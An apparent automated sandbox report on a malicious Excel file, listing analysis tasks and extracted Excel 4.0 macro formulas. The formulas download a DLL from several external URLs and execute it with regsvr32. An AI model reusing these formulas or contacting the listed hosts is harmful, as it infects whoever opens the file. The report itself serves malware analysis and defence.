Static task
static1
Behavioral task
behavioral1
Sample
b40b78ae542f9fd8dd80f9106d8d8f96f302c192dafd135d4f1261ab946e22ce.xlsx
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
b40b78ae542f9fd8dd80f9106d8d8f96f302c192dafd135d4f1261ab946e22ce.xlsx
Resource
win10v2004-20240802-en
General
-
Target
b40b78ae542f9fd8dd80f9106d8d8f96f302c192dafd135d4f1261ab946e22ce
-
Size
29KB
Malware Config
Extracted
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.doh-designsection.com/Files/LXZv9wBqLH/","..\xewn.dll",0,0)
=IF('PIMKE'!C14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.centurypapers.com/database-wordpres/VDYOi/","..\xewn.dll",0,0))
=IF('PIMKE'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://draheimdesign.com/allyears_jdrf_video/DZEUcZ5/","..\xewn.dll",0,0))
=IF('PIMKE'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://fontecmobile.com/pk/tRqU7/","..\xewn.dll",0,0))
=IF('PIMKE'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://dunyaaslan.com/cgi-bin/IwvOXl/","..\xewn.dll",0,0))
=IF('PIMKE'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://dusangerzicgera.com/img/4v7QHP/","..\xewn.dll",0,0))
=IF('PIMKE'!C24<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll")
=RETURN()
Signatures
Files
-
b40b78ae542f9fd8dd80f9106d8d8f96f302c192dafd135d4f1261ab946e22ce.xlsx office2007